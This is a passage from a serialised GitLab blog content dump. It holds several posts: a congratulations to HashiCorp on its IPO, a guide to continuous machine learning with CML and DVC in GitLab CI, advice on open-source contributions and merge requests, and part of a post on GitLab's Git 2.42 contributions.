future.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663383/Blog/Hero%20Images/tanuki-bg-full.png","https://about.gitlab.com/blog/congratulations-to-hashicorp","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Congratulations to HashiCorp! Enjoy the cake!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2021-12-09\",\n      }",{"title":1405,"description":1406,"authors":1411,"heroImage":1407,"date":1412,"body":1413,"category":682,"tags":1414},[970],"2021-12-09","![Cake with message reading \"Congrats on your IPO!\"](https://about.gitlab.com/images/blogimages/hashicorp-cake.jpg)\n\nFrom one open source DevOps company to another, we want to congratulate HashiCorp on becoming a public company! In celebration of your debut in the public markets we sent you a cake!\n\nGitLab and HashiCorp have been partners since 2019. And not only do we work well together, we have a lot in common: both companies have strong business models that are open-core providing both open-source and proprietary features for DevOps practitioners enabling them to create safer software faster. We may solve very different problems in the DevOps ecosystem, but that’s what makes us great partners.\n\n## HashiCorp: always ahead of the curve\n\nAlthough co-founder Mitchell Hashimoto didn’t officially incorporate HashiCorp (named after him) until 2012, he was making contributions to the open source community [from the time he was a teen](https://thenewstack.io/new-stack-makers-mitchell-hashimoto-vagrant-containers-growing-open-source/). And it’s clear Mitchell and team approached the business with a fresh perspective: HashiCorp’s Vagrant was the first automated provisioning of developer environments, which was very useful for onboarding and demos. When Docker became more popular, Vagrant added a Docker provider, making it more usable, even with Docker and Docker Compose later around.\n\nThe team made another bold move in 2014, rolling out the HashiCorp configuration language (HCL) as an alternative to YAML. The step got developers talking and taking sides, but also thinking about what might work best.\n\nAll of those efforts led to perhaps the most ground-breaking part of HashiCorp’s strategy: Vault. The company’s solution that safely stores and controls access to tokens, secrets, API keys, and more, is not just successful, it’s revolutionary. HashiCorp has turned the idea of secrets keeping on its head, by not just allowing companies to store secrets away, but to also have to renew them regularly, kind of like changing the locks on your door on a regular schedule, rather than giving out lots of keys. Clearly this is a paradigm shift for security.\n\n## HashiCorp and GitLab together\n\nVault’s a breakthrough technology for HashiCorp (don’t forget you can use GitLab with Vault to set up [GitLab OpenID connect for authentication](https://docs.gitlab.com/ee/integration/vault.html) or access your [secrets securely in CI](https://docs.gitlab.com/ee/ci/secrets/) as variables) but it’s just one of many that we integrate with.\n\n### Terraform and the GitLab DevOps Platform\n\n[Terraform](https://www.terraform.io) plays a critical role in GitLab’s GitOps/Infrastructure as Code (IaC) workflows, lowering the barriers to entry for teams to adopt Terraform while enabling them to use more stages on the DevOps platform. GitLab’s Terraform integration allows teams to manage the Terraform state in GitLab without external configuration backends.\n\nWe have created the [GitLab Terraform Provider](https://docs.gitlab.com/ee/user/infrastructure/iac/#the-gitlab-terraform-provider) to manage resources on your GitLab instance like groups, projects, users, and more to improve productivity by eliminating an engineer’s dependence on provisioning requests.\n\nA merge request is the center of all collaboration on the DevOps platform. It is important to verify how changes will affect your infrastructure, taking advantage of the [Terraform integration with merge requests](https://docs.gitlab.com/ee/user/infrastructure/iac/mr_integration.html). You can see the planned changes to your infrastructure without leaving the scope of a merge request review at the same time.\n\nUsing GitLab as a [Terraform Module Registry](https://docs.gitlab.com/ee/user/packages/terraform_module_registry/) allows you to publish and reference private Terraform modules in your project’s infrastructure registry, ensuring it’s possible to reuse modules across projects securely. Along with our [IaC security scanning](https://about.gitlab.com/releases/2021/11/22/gitlab-14-5-released/#introducing-infrastructure-as-code-iac-security-scanning) as part of the verify stage, you can safely maintain your infrastructure with ease.\n\n### Terraform and GitLab.com\n\nTerraform is used to manage all the environments of [GitLab.com’s infrastructure](https://gitlab.com/gitlab-com/gitlab-com-infrastructure/) in a single project, allowing collaboration across the entire engineering organization. It is also playing a critical role in our ongoing [migration to Kubernetes](https://about.gitlab.com/handbook/engineering/infrastructure/production/kubernetes/gitlab-com/). Want to deploy a stateful application quickly? GitLab’s [five-minute production app](https://gitlab.com/gitlab-org/5-minute-production-app/deploy-template) template leverages the power of Terraform to get you from idea to production in minutes.\n\n## We’re all-remote\n\nHashiCorp is a remote-first, distributed organization and publicly shares [proven principles](https://works.hashicorp.com) for everyone to learn. GitLab shares this passion for expanding access to opportunity, bolstering global communities, and building more inclusive workplaces where everyone can contribute.\n\n## We see the promise of the future\n\nThe successes of companies like GitLab and HashiCorp, as well as MongoDB and Confluent, on the open market show providing a free tier and commercial offering can be a highly profitable business model for open source technologies and we believe the DevOps market potential is just starting to be tapped.\n\nIn the [words of Dave Bullock](https://about.gitlab.com/blog/wag-labs-blog-post/), former Director of engineering at Wag!: “_We use GitLab with Terraform to test, review, save, and deploy all of our infrastructure as well as the application…The original idea was to just use GitLab as our CI platform. But as we built that out, we started using it for more and more tasks, and ended up using it for our full CI/CD pipeline._”  This is an example of the power of the DevOps Platform. GitLab’s partnership with HashiCorp has made it easier for customers to use more stages of the DevOps Platform. \n\nWe’re joining the global chorus in wishing HashiCorp the best of luck with its public offering.",[685,9,231],{"slug":1416,"featured":6,"template":689},"congratulations-to-hashicorp","content:en-us:blog:congratulations-to-hashicorp.yml","Congratulations To Hashicorp","en-us/blog/congratulations-to-hashicorp.yml","en-us/blog/congratulations-to-hashicorp",{"_path":1422,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1423,"content":1429,"config":1436,"_id":1438,"_type":14,"title":1439,"_source":16,"_file":1440,"_stem":1441,"_extension":19},"/en-us/blog/continuous-machine-learning-development-with-gitlab-ci",{"title":1424,"description":1425,"ogTitle":1424,"ogDescription":1425,"noIndex":6,"ogImage":1426,"ogUrl":1427,"ogSiteName":673,"ogType":674,"canonicalUrls":1427,"schema":1428},"How machine learning ops works with GitLab and continuous machine learning","We share different machine learning use cases for CML projects using GitLab CI.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681802/Blog/Hero%20Images/gitlab_cml_dvc_banner.png","https://about.gitlab.com/blog/continuous-machine-learning-development-with-gitlab-ci","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How machine learning ops works with GitLab and continuous machine learning\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dr. Elle O'Brien\"}],\n        \"datePublished\": \"2020-12-01\",\n      }",{"title":1424,"description":1425,"authors":1430,"heroImage":1426,"date":1432,"body":1433,"category":930,"tags":1434},[1431],"Dr. Elle O'Brien","2020-12-01","\n\nContinuous integration (CI) is standard practice in software development for speeding up development cycles, and for keeping them short and painless. CI means making small commits, often, and automating tests so every commit is a release candidate.\n\nWhen a project involves machine learning (ML), though, new challenges arise: Traditional [version control systems](/topics/version-control/) (like Git) that are key to CI struggle to manage large datasets and models.\nFurthermore, typical pass-fail tests are too coarse for understanding ML model performance – you might need to consider how several metrics, like accuracy, sensitivity, and specificity, are affected by changes in your code or data.\nData visualizations like confusion matrices and loss plots are needed to make sense of the high-dimensional and often unintuitive behavior of models.\n\n## Continuous machine learning: an introduction\n\n[Iterative.ai](https://iterative.ai), the team behind the popular open source version control system for ML projects [DVC](https://dvc.org) (short for Data Version Control),\nhas recently released another open source project called [CML](https://cml.dev), which stands for continuous machine learning.\nCML is our approach to adapting powerful CI systems like GitLab CI to common data science and ML use cases, including:\n\n- Automatic model training\n- Automatic model and dataset testing\n- Transparent and rich reporting about models and datasets (with data viz and metrics) in a merge request (MR)\n\n## Your first continuous machine learning report\n\nCML helps you put tables, data viz, and even sample outputs from models into comments on your MRs, so you can review datasets and models like code.\nLet's see how to produce a basic report – we'll train an ML model using GitLab CI, and then report a model metric and confusion matrix in our MR.\n\n![Confusion Matrix](https://about.gitlab.com/images/blogimages/cml_confusion_matrix.jpg){: .shadow.medium.center}\nConfusion matrix\n{: .note.text-center}\n\nTo make this report, our `.gitlab-ci.yml` contains the following workflow:\n\n```\n# .gitlab-ci.yml\nstages:\n    - cml_run\n\ncml:\n    stage: cml_run\n    image: dvcorg/cml-py3:latest\n\n    script:\n        - pip3 install -r requirements.txt\n        - python train.py\n\n        - cat metrics.txt >> report.md\n        - echo >> report.md\n        - cml-publish confusion_matrix.png --md --title 'confusion-matrix' >> report.md\n        - cml-send-comment report.md\n\n```\n\nThe entire [project repository is available here](https://gitlab.com/iterative.ai/cml-base-case/).\nThe steps consist of the following:\n\n- **Train**: This is a classic training step where we install requirements (like `pip` packages) and run the training script.\n- **Write a CML report**: Produced metrics are appended to a markdown report.\n- **Publish a CML report**: CML publishes an image of the confusion matrix with the embedded metrics to your GitLab MR.\n\nNow, when you and your teammates are deciding if your changes have had a positive effect on your modeling goals,\nyou have a dashboard of sorts to review. Plus, this report is linked by Git to your exact project version (data and code) and the runner used for training and the logs from that run.\n\nThis is the simplest use case for achieving continuous machine learning with CML and GitLab. In the next section we'll look at a more complex use case.\n\n## CML with DVC for data version control\n\nIn machine learning projects, you need to track changes in your datasets as well as changes in your code.\nSince Git is frequently a poor fit for managing large files, we can use [DVC](https://dvc.org) to link remote datasets to your CI system.\n\n```\n# .gitlab-ci.yml\nstages:\n  - cml_run\n\ncml:\n  stage: cml_run\n  image: dvcorg/cml-py3:latest\n  script:\n    - dvc pull data\n\n    - pip install -r requirements.txt\n    - dvc repro\n\n    # Compare metrics to master\n    - git fetch --prune\n    - dvc metrics diff --show-md master >> report.md\n    - echo >> report.md\n\n    # Visualize loss function diff\n    - dvc plots diff\n      --target loss.csv --show-vega master > vega.json\n    - vl2png vega.json | cml-publish --md >> report.md\n    - cml-send-comment report.md\n```\n\nThe entire [project is available here](https://gitlab.com/iterative.ai/cml-dvc-case).\nIn this workflow, we have additional steps that use DVC to pull a training dataset, run an experiment, and then use CML to publish the report in your MR.\n\n![CML with DVC](https://about.gitlab.com/images/blogimages/cml_dvc.jpg){: .shadow.medium.center}\nCML with DVC\n{: .note.text-center}\n\nFor more details about ML data versioning and tracking, check out the [DVC documentation](https://dvc.org/doc).\n\n## Summary\n\nWe made CML to adapt CI to machine learning, so data science teams can enjoy benefits such as:\n\n- Your code, data, models, and training infrastructure (hardware and software environment) will be Git versioned.\n- You’re automating work, testing frequently, and getting fast feedback (with visual reports if you use CML). In the long run, this will almost certainly speed up your project’s development.\n- CI systems make your work visible to everyone on your team. No one has to search very hard to find the code, data, and model from your best run.\n\n### About the guest author\n\n_Dr. Elle O'Brien is a Ph.D data scientist at iterative.ai and co-creator of [CML](https://cml.dev) project. She is also a lecturer at [UMSI](https://www.si.umich.edu/)._\n",[109,267,231,9,1435],"AI/ML",{"slug":1437,"featured":6,"template":689},"continuous-machine-learning-development-with-gitlab-ci","content:en-us:blog:continuous-machine-learning-development-with-gitlab-ci.yml","Continuous Machine Learning Development With Gitlab Ci","en-us/blog/continuous-machine-learning-development-with-gitlab-ci.yml","en-us/blog/continuous-machine-learning-development-with-gitlab-ci",{"_path":1443,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1444,"content":1450,"config":1456,"_id":1458,"_type":14,"title":1459,"_source":16,"_file":1460,"_stem":1461,"_extension":19},"/en-us/blog/contribute-to-open-source-land-jobs",{"title":1445,"description":1446,"ogTitle":1445,"ogDescription":1446,"noIndex":6,"ogImage":1447,"ogUrl":1448,"ogSiteName":673,"ogType":674,"canonicalUrls":1448,"schema":1449},"How contributing to open source can help you land your first job","Six compelling reasons why, warm fuzzy feelings aside, contributing to open source is good for your career.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679362/Blog/Hero%20Images/contribute-open-source-jobs.jpg","https://about.gitlab.com/blog/contribute-to-open-source-land-jobs","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How contributing to open source can help you land your first job\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ariel Camus\"}],\n        \"datePublished\": \"2018-04-06\",\n      }",{"title":1445,"description":1446,"authors":1451,"heroImage":1447,"date":1453,"body":1454,"category":10,"tags":1455},[1452],"Ariel Camus","2018-04-06","\n\nContributing to open source can significantly boost your chances of getting a job. And even\nthough this is true for all developers, regardless of their level of experience, it's especially\nimportant for entry-level ones.\n\nLet me make this perfectly clear: **contributing to open source is the most effective job-seeking\n hack you can take advantage of right now**.\n\nEven better, by contributing to open source you won't only improve your chances\nof getting a job, but you will also give back to the community, meet amazing and talented\npeople, and feel incredibly accomplished when your first contribution gets accepted.\n\nAt [Microverse](https://www.microverse.org/), the company I founded, we train remote software developers from all around\n the world, and we ask them to contribute to open source, starting from their first day in the program.\n\n**Here are six reasons why contributing to open source will help you too.**\n\n## Reason 1: Work as part of a (distributed) team\n\nWhen looking for a job, experience counts. However, experience limited to coding and the\nlanguage syntax is not enough. You need to know how to work as part of a team,\ncollaborating with others to build large and complex applications.\n\n**How do you get that kind of collaborative and at-scale experience if you can't get a job first?**\nThe answer is open source.\n\nLarge, open source projects are almost always built by a large team. Sometimes the people in\nthose teams even work for large organizations (e.g. GitLab, React/Facebook, etc.). By\nbecoming a contributor you get the chance to **work with those exceptional teams without\nhaving to be hired by those companies**.\n\nYou will sharpen your written communication skills, understand how to pick and negotiate\nthings to work on, perfect your Git Flow/[GitLab Flow](https://docs.gitlab.com/ee/topics/gitlab_flow.html), and many other things that are as\nvaluable as understanding the language syntax.\n\n## Reason 2: Work in a complex and large application\n\nIf you join a company, you will most likely work on an existing application. And, probably, it\nwill be a large and complex one. As a coding student you rarely have the chance to do that,\nbut when you join an open source project, that's exactly the scenario that you will face.\n\nYou will first need to **set up your local development environment** following the contributing\nguidelines provided by the project. You will then start by **refactoring existing code** to correct\ntypos and fix small bugs, the same way you would at a regular job! Finally, you will start\nunderstanding how all the **pieces** of a large application fit together, how it was **architected**,\nand where the code for each **functionality** lives.\n\nThese are not things you could experience working on small learning projects, but you need\nthis kind of experience if you want to land a job.\n\n## Reason 3: Get a lot of good feedback\n\nEvery time you pick an open source issue to work on, you will start by forking the project\nand creating a feature branch. You will write tests and code until you are happy with your\nsolution, and then submit a merge request to the original code.\n\nHowever, this is just the first step in the process. One of the main developers at the project\nwill review your merge request and will tell you if it's ready to be merged. Most likely it won't.\n But that's fine, because **she will also provide feedback about what you need to fix before\n your code can be merged**.\n\nCan you imagine getting this kind of direct feedback from a seasoned developer at GitLab or\nFacebook? Think about it… they really want your help, but they also need to keep the quality\nof the code at a high level. They will help you, and you will end up learning a lot in the process.\n\n## Reason 4: Build an online reputation\n\nGetting experience working as part of a team and contributing to large and complex applications\nis really important, but it won't help you land a job unless companies can find you and want to interview you.\n\nContributing to open source will help you with that too. After quickly reading your resume,\nemployers will want to find you online, and they will want to see your code. **GitLab and\nGitHub profiles are the new resumes**.\n\nIf employers can see that you are an active member of large open source projects, that will\ntell them something else that is very important: software is not just what you do for a living,\nbut it's also your passion and hence what you do in your free time.\n\nWhat do employers currently find when they search your name on Google? Open source will\nmake you look great!\n\n## Reason 5: Network with the community\n\nOpen source projects often have large organizations behind them who are constantly hiring\nnew developers. Wouldn't it be great for those organizations if they could hire people who\nlove their product? What if their new hires knew the product so well already that they could\nbe productive contributors from the moment they join the company?\n\nWell, that's exactly the value you offer as an active member of an open source community.\n**You know the product, you know the code, and the people behind the project know you.\nChances are that you will eventually be offered to work for them**. In fact, almost\na third of the first 40 engineers that GitLab hired were contributors to its codebase first.\n\n## Reason 6: Stay motivated\n\nLast, but not least, we all know the single and most important advice to be successful at anything\nis perseverance. However, staying motivated and focused while learning to code and applying\nfor jobs is not easy. There are a lot of things to learn, a lot of different paths to take, and many\nrejections on the path to landing your first job.\n\nJoining an open source project will give you the real-world encouragement and a community\n to support you throughout the journey.\n\nAre you convinced that contributing to open source is the best thing you can do right now to\nhelp you on your way to landing your first job? I'm pretty sure you are. Go ahead and [start now](/community/contribute/)!\n\n### About the guest author\n\n[Ariel Camus](https://twitter.com/arielcamus) is the founder of [Microverse](https://www.microverse.org/),\na company finding the world's untapped talent and training it to become remote software developers. Ariel was previously the co-founder and CEO\nof TouristEye, a travel startup that he grew to a million users and sold to Lonely Planet in 2013.\n\nCover photo by [Maik Jonietz](https://unsplash.com/@der_maik_?utm_source=medium&utm_medium=referral) on [Unsplash](https://unsplash.com?utm_source=medium&utm_medium=referral)\n{: .note}\n",[267,1078,9],{"slug":1457,"featured":6,"template":689},"contribute-to-open-source-land-jobs","content:en-us:blog:contribute-to-open-source-land-jobs.yml","Contribute To Open Source Land Jobs","en-us/blog/contribute-to-open-source-land-jobs.yml","en-us/blog/contribute-to-open-source-land-jobs",{"_path":1463,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1464,"content":1470,"config":1476,"_id":1478,"_type":14,"title":1479,"_source":16,"_file":1480,"_stem":1481,"_extension":19},"/en-us/blog/contributing-to-gitlab-with-ease",{"title":1465,"description":1466,"ogTitle":1465,"ogDescription":1466,"noIndex":6,"ogImage":1467,"ogUrl":1468,"ogSiteName":673,"ogType":674,"canonicalUrls":1468,"schema":1469},"Contributing to GitLab with ease","Everyone can contribute to GitLab, so here are a few tips to make your experience easy and pleasant.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678997/Blog/Hero%20Images/mergerequestsgame.jpg","https://about.gitlab.com/blog/contributing-to-gitlab-with-ease","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Contributing to GitLab with ease\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Lin Jen-Shin\"}],\n        \"datePublished\": \"2018-08-23\",\n      }",{"title":1465,"description":1466,"authors":1471,"heroImage":1467,"date":1473,"body":1474,"category":10,"tags":1475},[1472],"Lin Jen-Shin","2018-08-23","\nAs a [Merge Request Coach](https://handbook.gitlab.com/job-families/expert/merge-request-coach/), I am happy to\nhelp community contributors feel comfortable when contributing\nto GitLab. During my time reviewing merge requests, I’ve learned a bit about\nhow it feels contributing to GitLab as a newcomer, and I’d like to share\nmy learnings with you.\n\n## Common issues in an MR (merge request)\n\nIn the past, I think styling might have been one of the most common issues.\nHowever, we’re improving our CI to run more static analysis, so these issues\nare now automatically pointed out. Today, contributors can easily see what\ndidn’t pass CI, and they can fix the issues very quickly, so this is not as\ncommon as it was in the past.\n\nThe biggest issue today might be that many contributors don’t add tests, since\ntests often require much more effort than fixing or adding something. If\nyou’re struggling with adding tests, please don’t worry. Merge request coaches\ncan tell you how to add tests when we see your contribution, and we’ll work\nthrough it together.\n\n## Best practices\n\n1. If you only remember one best practice, I hope it is to keep this\nreference handy when [contributing to GitLab](https://gitlab.com/gitlab-org/gitlab-ce/blob/master/doc/development/contributing/index.md).\nI know it’s super long, but it has all the information you need when it comes\nto making contributions to GitLab.\n\n2. Get [GDK](https://gitlab.com/gitlab-org/gitlab-development-kit) set up\nlocally if you haven’t already. Running tests locally is the best way to\ndevelop and debug, and I highly encourage that you incorporate this into your\nworkflow.\n\n3. Don’t ignore CI. If your pipeline didn’t pass, it’s important to go back and\nidentify the problem. Troubleshooting issues is a great way to practice your\nskills and help you learn from mistakes.\n\n4. Look at the [GitLab team page](/company/team/) and pick a merge request coach to\nping if you need help. Merge request coaches guide contributors and will even\njump in to help finish an MR if a contributor can no longer work on it,\nensuring that the attribution stays with the original contributor. Our goal is\nto help everyone feel comfortable and empowered to contribute even with\nsmallest possible effort. Coaches have other responsibilities and don’t always\nproactively look for contributors who need help, so ping them if you’re stuck\nor ready for a review. If they’re not the right person to ping, they’ll pass\nyou over to the right one. We love helping community contributors, and we look\nforward to guiding and working with you.\n\n## Little-known features\n\nWe [recently welcomed](/blog/introducing-gitlab-s-integrated-development-environment/)\nWeb IDE to quickly edit multiple files on the web directly without cloning\nthe whole repository. Web IDE is useful if you just want to make some small\nchanges online. If you’d like to learn more about Web IDE, please\nhead over to our [documentation](https://docs.gitlab.com/ee/user/project/web_ide/).\n\nSince GitLab's development velocity is pretty high, sometimes conflicts can\nhappen very frequently. Did you know that you can resolve conflicts directly\nfrom the web UI? I really love this feature, because it’s very easy to resolve\nsimple conflicts, and I don’t need to launch my editor or Git to pull, merge,\nand push. With some simple clicks, I can save a lot of time for simple\nconflicts.\n\n## What everyone should know about MRs\n\nTo me, an MR is a tool to interactively develop and explore with other people.\nDon’t worry about being perfect in the first version of your MR. We learn\nthrough our mistakes and get better over time.\n\nIf you’ve made tons of contributions, we invite you to join our\n[core team](/community/core-team/) or apply for a [full-time position](/jobs/) at GitLab.\nThe MR is one of the most important ways we work together, and we’d love to\ncollaborate with you.\n\n## What to do if you’re struggling\n\nIf you’re having some trouble getting the hang of merge requests, I suggest\ntaking a look at how others work on the MRs. Following other people’s example\ncan help you understand what they did and why they did it. Reaching out to a\nmerge request coach, joining discussions, and reviewing others’ code are also\nways to help you get up to speed. I think that interacting with others is a\ngreat way to learn and improve.\n\n## We’d love your contributions!\n\nWe really enjoy collaborating with community contributors, and we look forward\nto working together. If you don't know what you can contribute, please take a\nlook at [`Accepting merge requests`](https://gitlab.com/gitlab-org/gitlab-ce/issues?label_name[]=Accepting+merge+requests).\nWe label some issues to explicitly call out the ones that we won’t schedule\nanytime soon, but we still want it. These issues usually have very clear scopes,\nso they often just require a simple implementation. They’re nice targets if\nyou don’t know what to contribute but want to gain experience.\n\nIf you would like to see how we handle community contributions, please take a\nlook at [`Community contribution`](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests?label_name[]=Community%20contribution).\nWe put this label on all community contributions, therefore you can easily\nfind all the past and current community contributions. We look forward to\nyour future contributions as well!\n\n[Cover image](https://unsplash.com/photos/vqDAUejnwKw) by\n[Victor Freitas](https://unsplash.com/@victorfreitas), licensed\nunder [CC X](https://unsplash.com/license).\n{: .note}\n",[267,779,1037,803,9],{"slug":1477,"featured":6,"template":689},"contributing-to-gitlab-with-ease","content:en-us:blog:contributing-to-gitlab-with-ease.yml","Contributing To Gitlab With Ease","en-us/blog/contributing-to-gitlab-with-ease.yml","en-us/blog/contributing-to-gitlab-with-ease",{"_path":1483,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1484,"content":1490,"config":1497,"_id":1499,"_type":14,"title":1500,"_source":16,"_file":1501,"_stem":1502,"_extension":19},"/en-us/blog/contributions-to-git-2-42-release",{"title":1485,"description":1486,"ogTitle":1485,"ogDescription":1486,"noIndex":6,"ogImage":1487,"ogUrl":1488,"ogSiteName":673,"ogType":674,"canonicalUrls":1488,"schema":1489},"Git 2.42 release: Here are four of our contributions in detail","Find out how GitLab's Git team helped improve Git 2.42.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667792/Blog/Hero%20Images/git-241.jpg","https://about.gitlab.com/blog/contributions-to-git-2-42-release","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git 2.42 release: Here are four of our contributions in detail\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christian Couder\"}],\n        \"datePublished\": \"2023-10-12\",\n      }",{"title":1485,"description":1486,"authors":1491,"heroImage":1487,"date":1493,"body":1494,"category":1495,"tags":1496},[1492],"Christian Couder","2023-10-12","\n\n[Git 2.42](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.42.0.txt)\nwas officially released on August 21, 2023, and included some\nimprovements from GitLab's Git team. Git is the foundation of\nrepository data at GitLab. GitLab's Git team works on new features, performance improvements, documentation improvements,\nand growing the Git community. Often our contributions to Git have a\nlot to do with the way we integrate Git into our services at\nGitLab.\n\nWe previously shared [some of our improvements that were included in the Git 2.41 release](https://about.gitlab.com/blog/contributions-to-latest-git-release/). Here are some highlights from the Git 2.42 release, and a\nwindow into how we use Git on the server side at GitLab.\n\n## 1. Prevent certain refs from being packed\n\n### Write-ahead logging\nIn [Gitaly](https://docs.gitlab.com/ee/administration/gitaly/), we\nwant to use a [write-ahead log](https://gitlab.com/groups/gitlab-org/-/epics/8911)\nto replicate Git operations on different machines.\n\nThis means that the Git objects and references that should be changed\nby a Git operation are first kept in a log entry. Then, when all the\nmachines have agreed that the operation should proceed, the log entry\nis applied so the corresponding Git objects and references are\nactually added to the repositories on all the machines.\n\n### Need for temporary references\nBetween the time when a specific log entry is first written and when\nit is applied, other log entries could be applied which could remove\nsome objects and references. It could happen that these objects and\nreferences are needed to apply the specific log entry though.\n\nSo when we log an entry, we have to make sure that all the objects and\nreferences that it needs to be properly applied will not be removed\nuntil that entry is either actually applied or discarded.\n\nThe best way to make sure things are kept in Git is to create new Git\nreferences pointing to these things. So we decided to use temporary\nreferences for that purpose. They would be created when a log entry is\nwritten, and then deleted when that entry is either applied or\ndiscarded.\n\n### Packed-refs performance\nGit can store references in \"loose\" files, with one reference per\nfile, or in the `packed-refs` file, which contains many of them. The\n`git pack-refs` command is used to pack some references from \"loose\"\nfiles into the `packed-refs` file.\n\nFor reading a lot of references, the `packed-refs` file is very\nefficient, but for writing or deleting a single reference, it is not\nso efficient as rewriting the whole `packed-refs` file is required.\n\nAs temporary references are to be created and then deleted soon after,\nstoring them in the `packed-refs` file would not be efficient. It\nwould be better to store them in \"loose\" files.\n\nThe `git pack-refs` command had no way to be told precisely which refs\nshould be packed or not though. By default it would repack all the\ntags (which are refs in `refs/tags/`) and all the refs that are\nalready packed. With the `--all` option one could tell it to repack\nall the refs except the hidden refs, broken refs, and symbolic refs,\nbut that was the only thing that could be controlled.\n\n### Improving `git pack-refs`\nWe decided to improve `git pack-refs` by adding two new options to it:\n  - `--include \u003Cpattern>` which can be used to specify which refs should be packed\n  - `--exclude \u003Cpattern>` which can be used to specify which refs should not be packed\n\n[John Cai](https://gitlab.com/jcaigitlab), Gitaly:Git team engineering manager, implemented these options.\n\nFor example, if the refs managed by the write-ahead log are in\n`refs/wal/`, it's now possible the exclude them from being moved into\nthe `packed-refs` file by using:\n\n```\n$ git pack-refs --exclude \"refs/wal/*\"\n```\n\nDetails of the patch series, including discussions, can be found\n[here](https://lore.kernel.org/git/pull.1501.git.git.1683215331910.gitgitgadget@gmail.com/).\n\n## 2. Get machine-readable output from `git cat-file --batch`\n\n### Efficiently retrieving Git object information\nIn GitLab, we often retrieve Git object information. For example, when a\nuser navigates into the files and directories in a repository, we need\nto get the content of the corresponding Git blobs and trees so that\nwe can show it.\n\nIn Gitaly, we use `git cat-file` to retrieve Git object information\nfrom a Git repository. As it's a frequent operation, it needs to be\nperformed efficiently, so we use the batch modes of `git cat-file`\navailable through the `--batch`, `--batch-check` and `--batch-command`\noptions.\n\nIn these modes, a pointer to a Git object can be repeatedly sent to\nthe standard input, called 'stdin', of a `git cat-file` command, while\nthe corresponding object information is read from the standard ouput,\ncalled 'stdout' of the command. This way we don't need to launch a\nnew `git cat-file` command for each object.\n\nGitLab can keep, for example, a `git cat-file --batch-command` process\nrunning in the background while feeding it commands like\n`info \u003Cobject>` or `contents \u003Cobject>` through its stdin to\nget either information about an object or its content.\n\n### Newlines in stdin, stdout, and filenames\nThe commands or pointers to Git objects that are sent through stdin\nshould be delimited using newline characters, and in the same way `git\ncat-file` will use newline characters to delimit the information from\ndifferent Git objects in its output. This is a common shell practice\nto make it easy to chain commands together. For example, one can\neasily get the size (in bytes) of the last three commits on the current\nbranch using the following:\n\n```\n$ git log -3 --format='%H' | git cat-file --batch-check='%(objectsize)'\n285\n646\n428\n```\n\nSometimes, though, the pointer to a Git object can contain a filename\nor a directory name, as such a pointer is allowed to be in the form\n`\u003Cbranch>:\u003Cpath>`. For example `HEAD:Documentation` is a valid\npointer to the blob or the tree corresponding to the `Documentation`\npath on the current branch.\n\nThis used to be an issue because on some systems newline characters\nare allowed in file or directory names. So the `-z` option was\nintroduced last year in Git 2.38 to allow users to change the input\ndelimiter in batch modes to the NUL character.\n\n### Error output\nWhen the `-z` option was introduced, it wasn't considered useful to\nchange the output delimiter to be also the NUL character. This is\nbecause only tree objects can contain paths and the internal format\nof tree objects already uses NUL characters to delimit paths.\n\nUnfortunately, it was overlooked that in case of an error the pointer\nto the object is displayed in the error message:\n\n```\n$ echo 'HEAD:does-not-exist' | git cat-file --batch\nHEAD:does-not-exist missing\n```\n\nAs the error messages are printed along with the regular ouput of the\ncommand on stdout, passing in an invalid pointer with a number of\nnewline characters in it could make it very difficult to parse the\noutput.\n\n### -Z comes to the rescue\n[Toon Claes](https://gitlab.com/toon), Gitaly senior engineer, initially worked on a\npatch to just quote the pointer in the error message, but it was\ndecided in the Git mailing list discussions related to the patch that\nit would be better to just create a new `-Z` option. This option would\nchange both the input and the output delimiter to the NUL character,\nwhile the old `-z` option would be deprecated over time.\n\nSo [Patrick Steinhardt](https://gitlab.com/pks-gitlab), Gitaly staff engineer, implemented that new `-Z` option.\n\nDetails of the patch series, including discussions, can be found\n[here](https://lore.kernel.org/git/20221209150048.2400648-1-toon@iotcl.com/)\nand [here](https://lore.kernel.org/git/cover.1685710884.git.ps@pks.im/).\n\n## 3. Pass pseudo-options to `git rev-list --stdin`\n\n### Computing sizes\nIn GitLab, we need to have different ways to compute the size of Git\nrelated content. For example, we need to know:\n  - how much disk space a repository is using\n  - how big a specific Git object is\n  - how much additional space on a repository is required by a\n    specific set of revisions (and the objects they reference)\n\nKnowing \"how much disk space a repository is using\" is useful to\nenforce repository-related quotas and is easy to get using regular\nshell and OS features.\n\nSize information about a specific Git object is useful to enforce\nquotas related to maximum file size. It can be obtained using, for\nexample, `git cat-file -s \u003Cobject>` or\n`echo \u003Cobject> | git cat-file --batch-check='%(objectsize)'`\nas already seen above.\n\nComputing the space required by a set of revisions is useful, too, as\nforks can share Git content in what we call\n\"[pool repositories](https://docs.gitlab.com/ee/development/git_object_deduplication.html),\"\nand we want to discriminate how much content belongs to each forked\nrepository. Fortunately, `git rev-list` has a `--disk-usage` option\nfor this purpose.\n\n### Passing arguments to `git rev-list`\n`git rev-list` can take a number of different arguments and has a lot\nof different options. It's a fundamental command to traverse commit\ngraphs, and it should be flexible enough to fulfill a lot of different\nuser needs.\n\nWhen repositories grow, they often store a lot of references and a lot\nof files and directories, so there is often the need to 